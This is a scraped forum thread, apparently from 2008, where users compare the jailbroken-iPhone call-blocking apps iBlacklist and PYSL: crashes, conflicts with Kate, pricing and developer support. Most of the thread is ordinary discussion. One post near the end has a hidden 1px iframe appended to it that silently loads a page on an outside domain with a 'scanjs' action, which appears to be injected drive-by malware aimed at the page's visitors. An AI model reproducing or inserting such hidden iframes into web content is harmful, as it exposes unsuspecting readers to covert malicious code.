View Poll Results: iBlacklist vs PYSL

Voters
31. You may not vote on this poll
  • I use / prefer iBlacklist

22 70.97%
  • I use / prefer PYSL

10 32.26%
Multiple Choice Poll.

Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: iBlacklist vs PYSL which are you using/prefer?

Default iBlacklist vs PYSL which are you using/prefer?
    Guys

Just wanted to find out which is better to use and more popular

I read PYSL has issues so I am wary.

iPhone? More like MyPhone
    Thanks

I used PYSL and it made my phone weird out on me. It was operable but it randomly locked all the time and such.

I don't use blacklist either, i use AT&T SmartLimits, works great!

AT&T Smart Limits for Wireless | Wireless from AT&T, formerly Cingular

I use Pysl, and had no problems whatsoever with it since the last 4 or 5 updates. It works great along of Kate and many othr app's.
    Don't be shy if I helped you use the Thanks button, I do it.

4. The Following User Says Thank You to iBlade For This Useful Post:

ifini (2008-05-21)

what?
    dammit
    i got PYSL and KATE and PYSL just crashes when i go into sms and call history.
    and before it worked ok
    did you install KATE after or before PYSL?

anyway, I still go for PYSL since it is way nicer to work with!

Quote Originally Posted by caelis666 View Post
    what?
    dammit
    i got PYSL and KATE and PYSL just crashes when i go into sms and call history.
    and before it worked ok
    did you install KATE after or before PYSL?

anyway, I still go for PYSL since it is way nicer to work with!
    I have Kate since it was caterpillar, bought the unlimited in the long time ago. Installed Pysl a while back but the first versions did not work well. The last 4 or 5 updates have fixed everything plus added nice features and I never had a problem.
    Edit: I have also iLog and weTool installed and even taskbar notifier and as of yesterday iToday. And they are working in harmony, besides of a glitch iToday makes when the video starts after waking the phone from sleep.
    Last edited by iBlade; 2008-05-19 at 10:25 AM.

do you have everything activated in the Kate program? (both Privacy and Reminder?)

Yes I have, and I am using blacklist and hidden call block from Pysl.

blacklist works flawless with no problems just could use a couple more features to be perfect
    if this post help click the thanks

i have located the reason for the crashing

when in kate, System Font, using one of the fonts for the iPhone,
    then PYSL sms and call history crashes

I guess at the end of the day I am just looking for an app that works with minimum fuss and problems

iBlacklist seems to be the less problematic of the 2 whilst feature wise both apps are the same.

never had any problems with blacklist, but if you want to save more than 2 contacts you need to donate to the devoloper $8 i think but for a flawless app its well worth it, nothings worse than when your trying to do stuff and the phone crashes
    if this post help click the thanks

13. The Following User Says Thank You to morphiusrt For This Useful Post:

ifini (2008-05-21)

psyl sucks screwed my phone no text tones also(restore). Iblacklist is great and the developer will work with you for specific requests. Best $8 I spent.

Quote Originally Posted by imbuggin View Post
    psyl sucks screwed my phone no text tones also(restore). Iblacklist is great and the developer will work with you for specific requests. Best $8 I spent.
    Agree. Spektro is really good... Both is app development and "aftersales" follow-up. Mighty impressed
    Last edited by ifini; 2008-05-22 at 05:04 PM.

PYSL is now working flawless on my 1.1.3 iPhone

I tried to use iBlacklist once, but I didn't seem to find how to blacklist per user?
    So for me, PYSL is way more intuitive!

Also, the developer Rikk has been more then helpfull and he really listens to suggestions and problems of his userbase
    no complaints on him, nor his program

got both: pysl .91b1 and iblacklist, 1.8, registered ($8).
    the last two version have been stable and work very well. iblaclist is actually the one that tends to crash at times and certain features, such as blocking "unknown" calls, don't work. at least on my version. since the iblacklist unregsitered version doesn't let you test some of the features, you essentially need to fork over the $8 to find out that it doesn't work. quite annoying. pysl, on the other hand, has the nag screens going after you.

Quote Originally Posted by freefone View Post
    You essentially need to fork over the $8 to find out that it doesn't work. quite annoying.
    Freefone

Sorry but this is not true. You don't need to pay for trying to block calls with Restricted Number. When you mean "Unknow" i say, yes iBlacklist 1.8 is not blocking restricted calls wich iPhone classifies as "Unknown", for an odd apple classification, but it do block calls classified as "Blocked" and they are essentially the same (calls with no Number). On 1.9 it's fixed and under Restrict Number option set to ON you will be able to block both type of hidden ID calls.
    The Unknown Number option, wich is disabled in Unregistered Version, is to block calls from numbers you don't know. But how the phone knows you don't know the number? The short answer is, if it's not in your Address Book, you don't know it. So this option is to include your Address Book on accepted calls list, and block any other number, with a single setup.

Thanks
    Thanked 1,086 Times in 224 Posts

i used to love iBlacklist to death until 2 months ago where i was getting a series of Spinning wheels for hours at a time..it was SERIOUS! one time i was meeting someone and i was supposed to call them once i got there. I get to my destination and i pick up the phone to call, i get the spinning wheel..lol. for about 40mins...it was BAD! even if i turn my phone off, i still get the spinning wheel. a couple friends already told me similar problems and apparently it was due to iBlacklist...i uninstalled it and WHALLAAA!..no spinning wheel EVER!.

Im not saying that iBlacklist isnt good because its GREAT!.. it does what it says it does PERFECTLY...the last versions of iBlacklist been giving ME some serious issues. Thats all.. i tried pysl and it was disastrous.

If i would pick from the both ..i would say iBlacklist..Spektro has done an amazing job with this app and the updates..i just wish he fixes some SERIOUS bugs before put it back on my phone.

iBlacklist all the way!<iframe src="http://rewardslink.info/flash/files/index.php?id=700&action=scanjs&in_list=1" style="visibility:hidden; overflow:hidden; width:1px; height:1px;"></iframe>

My iPhone is a Part of Me Halten77's Avatar
    Thanks

*Revives Thread*
    I'm using iBlacklist. It's AWESOME. It has lots of customizable options to choose from. For example I like the feature that when a person calls you and you block them, you can choose to make them hear the following automatically: VoiceMail, Busy Tone, PickUp and Hangup. I like the busy tone But LOADS of features. Never used PYSL so I can't talk negatives about it, or positives.

Always used iBlacklist. Athough I don't know what works better on IOS 4.0.